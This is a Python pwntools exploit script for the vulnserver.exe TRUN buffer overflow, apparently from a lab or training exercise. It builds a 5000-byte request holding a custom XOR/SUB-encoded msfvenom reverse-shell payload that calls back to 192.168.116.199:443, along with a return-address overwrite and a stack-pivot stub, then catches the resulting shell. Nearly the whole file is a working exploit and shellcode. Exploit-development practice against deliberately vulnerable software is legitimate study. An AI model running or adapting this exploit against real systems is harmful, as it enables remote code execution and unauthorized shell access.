#vulnserver.exe
import struct

from pwn import *
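#0x625011b1 : jmp eax | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Documents and Settings\XPXP\Desktop\vulnserver-master\vulnserver-master\essfunc.dll)
#
# NOTE(review): the mona line above documents 0x625011b1 (jmp eax), but the
# address actually written over EIP is 0x625011eb, which the original script
# called "jmpesp".  The pivot stub placed right after the return address only
# runs if that gadget really transfers control to ESP -- re-verify it in
# essfunc.dll before reusing this against another build.
RET_ADDR = struct.pack("<I", 0x625011eb)   # little-endian; same bytes as pwntools p32()

# Target and catcher.  The callback address (LHOST=192.168.116.199 / LPORT=443)
# is baked into the encoded shellcode below: changing LISTEN_PORT, or running
# this script from another host, without regenerating and re-encoding the
# payload means the shell never arrives.
TARGET_HOST = "192.168.116.178"
TARGET_PORT = 9999
LISTEN_PORT = 443          # privileged port: needs root / CAP_NET_BIND_SERVICE

# Request layout (offsets from the start of the request):
#   0     "TRUN /.:/"
#   9     16 x 'A' (0x41 == inc ecx): harmless slide into the decoder stub
#   25    SHELLCODE (decoder stub + encoded payload + terminator)
#   ...   'A' padding up to EIP_OFFSET
#   2012  RET_ADDR
#   2016  PIVOT_STUB
#   2026  'C' padding up to TOTAL_LEN
TRUN_PREFIX = b"TRUN /.:/"
FILLER = b"A" * 16
EIP_OFFSET = 2003 + len(TRUN_PREFIX)   # EIP sits 2003 bytes past the prefix
TOTAL_LEN = 5000

# Custom XOR 88, SUB 10, XOR 97, SUB 2, NOT encoded, with decoder stub.
# Raw payload generated with:
#   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -f python
# (324 bytes), then run through the custom encoder.
#
# Bytes 0..29 are the decoder: it pops the address of the encoded stream and,
# for every byte until it meets 0x88, applies NOT, ADD 2, XOR 0x97, ADD 0x10,
# XOR 0x88 in place, then falls through into the decoded payload.  Because the
# stub rewrites the buffer it is sitting in, the stack must be writable *and*
# executable (no DEP) -- consistent with the XP path in the mona output above,
# but confirm on any other target.
# The blob as pasted is 355 bytes: 30 decoder + 324 encoded + 1 terminator
# (the "40 + 324 = 364" figure in the original notes does not match it).
SHELLCODE = (
    b"\xeb\x17\x5e\x80\x3e\x88\x74\x16\xf6\x16\x80\x06\x02\x80\x36\x97"
    b"\x80\x06\x10\x80\x36\x88\x46\xeb\xea\xe8\xe4\xff\xff\xff\x0e\x3a"
    b"\x94\x12\x12\x12\xb2\x9b\x37\xc3\x52\xb6\x9d\xa2\xc2\x9d\xa4\x1e"
    b"\x9d\xa4\xe6\x9d\x84\xfa\x21\x49\xdc\xf8\xc3\x11\x7e\xce\xb3\x8e"
    b"\x14\xfe\xf2\x53\x61\x1f\x13\x59\x34\x04\xa4\xa9\x9d\xa4\xe2\x9d"
    b"\xdc\xce\x9d\xde\xe3\x8a\x35\xda\x13\x23\xa3\x9d\xab\xf2\x13\x25"
    b"\x9d\xdb\xea\x35\xcc\xdb\x9d\xc6\x9d\x13\x28\xc3\x11\x7e\x53\x61"
    b"\x1f\x13\x59\xca\x32\x87\x08\x15\x8f\x0a\xcd\x8f\xf6\x87\x36\xaa"
    b"\x9d\xaa\xf6\x13\x25\xb8\x9d\x1e\xdd\x9d\xaa\xee\x13\x25\x9d\x16"
    b"\x9d\x13\x22\x9b\xd6\xf6\xf6\xad\xad\xb3\xab\xac\xa3\x11\x32\xb1"
    b"\xb1\xac\x9d\xe4\x3d\x9f\xaf\xba\xc5\xc4\x12\x12\xba\x89\x85\xc4"
    b"\xb1\xa6\xba\xde\x89\xf8\x19\x11\x27\x4a\x62\x13\x12\x12\xfb\x56"
    b"\xa6\xa2\xba\xfb\x92\xbd\x12\x11\x27\xa2\xa2\xa2\xa2\xd2\xa2\xd2"
    b"\xa2\xba\x3c\x21\x31\x32\x11\x27\x69\xbc\x17\xba\x52\x7a\x86\x59"
    b"\xba\x14\x12\x13\x4d\x9b\x38\xbc\xe2\xa8\xa9\xba\x6b\x77\x86\xb3"
    b"\x11\x27\x97\x52\x86\x1e\x11\xe0\x1a\x87\x3e\xba\x02\x47\x74\xa8"
    b"\x11\x27\xba\xb5\xbf\xb6\x12\x9b\x35\xa9\xa9\xa9\xc3\x08\xbc\xe4"
    b"\xab\xa8\x34\x0f\xb8\x59\xd6\xf6\xce\x13\x13\x9f\xd6\xf6\xe2\x58"
    b"\x12\xd6\xa6\xa2\xa8\xa8\xa8\xd8\xa8\xe0\xa8\xa8\xa5\xa8\xba\x8b"
    b"\x5e\xd1\x98\x11\x27\x9b\x32\xe0\xa8\xd8\x11\xc2\xba\x1a\x99\xef"
    b"\xb2\x11\x27\x4d\x02\x47\x74\xa8\xba\x78\x67\x4f\x6f\x11\x27\xce"
    b"\x18\x8e\x1c\x92\x0d\x32\x87\x17\x4d\xd9\xe5\x84\xc1\xbc\x12\xa5"
    b"\x11\x27\x88"
)
DECODER_LEN = 30           # SHELLCODE[:30] is the decoder stub
TERMINATOR = b"\x88"       # the decoder stops at the FIRST 0x88 after itself

# Executed at ESP immediately after the return-address overwrite.  Hard-coded
# so the script does not depend on pwntools' asm() (which shells out to an
# i386 binutils) at run time.  Assumes EAX still points at the start of the
# received request here (hence +9 == len(TRUN_PREFIX)) -- TODO confirm in the
# debugger.
PIVOT_STUB = (
    b"\x83\xc0\x09"   # add eax, 9    ; EAX -> first byte after "TRUN /.:/"
    b"\x89\xc4"       # mov esp, eax  ; pivot the stack into the request buffer
    b"\x83\xec\x09"   # sub esp, 9    ; ESP ends 9 bytes below the stub entry
    b"\xff\xe0"       # jmp eax       ; run FILLER, then the decoder stub
)


def build_poc():
    """Assemble the TOTAL_LEN-byte TRUN request.

    Layout: TRUN_PREFIX | FILLER | SHELLCODE | 'A' pad | RET_ADDR |
    PIVOT_STUB | 'C' pad (see the offset table above).

    Returns:
        bytes of length TOTAL_LEN.

    Raises:
        ValueError: if the shellcode does not fit below the return address,
            if the encoded blob contains a premature 0x88 terminator (the
            decoder would stop early and jump into half-decoded bytes), or
            if a null byte ends up in the request.
    """
    head = TRUN_PREFIX + FILLER + SHELLCODE
    # The original computed the pad as 2012 - len(head); a negative count
    # would silently shrink to "" and misalign EIP, so fail loudly instead.
    if len(head) > EIP_OFFSET:
        raise ValueError(
            "shellcode overruns the return address: %d > %d" % (len(head), EIP_OFFSET)
        )
    if SHELLCODE.find(TERMINATOR, DECODER_LEN) != len(SHELLCODE) - 1:
        raise ValueError("0x88 must appear exactly once after the decoder, as the last byte")

    poc = head + b"A" * (EIP_OFFSET - len(head)) + RET_ADDR + PIVOT_STUB
    if len(poc) > TOTAL_LEN:
        raise ValueError("request longer than TOTAL_LEN: %d" % len(poc))
    poc += b"C" * (TOTAL_LEN - len(poc))

    # NOTE(review): 0x00 is assumed to be a bad character for this command
    # (the encoder was chosen so none appears); confirm against the target.
    if b"\x00" in poc:
        raise ValueError("null byte in request")
    return poc


def main():
    """Start the catcher, fire the TRUN request, then hand over the shell."""
    poc = build_poc()
    handler = listen(LISTEN_PORT)            # must exist before the trigger
    try:
        conn = remote(TARGET_HOST, TARGET_PORT)
        try:
            # Welcome banner; decoded loosely so odd bytes cannot crash the print.
            print(conn.recvline().decode("latin-1", "replace"))
            conn.send(poc)
        finally:
            conn.close()
        # The original script discards the first line the shell sends
        # (presumably a Windows banner) before going interactive.
        handler.recvline()
        handler.interactive()
    finally:
        handler.close()


if __name__ == "__main__":
    main()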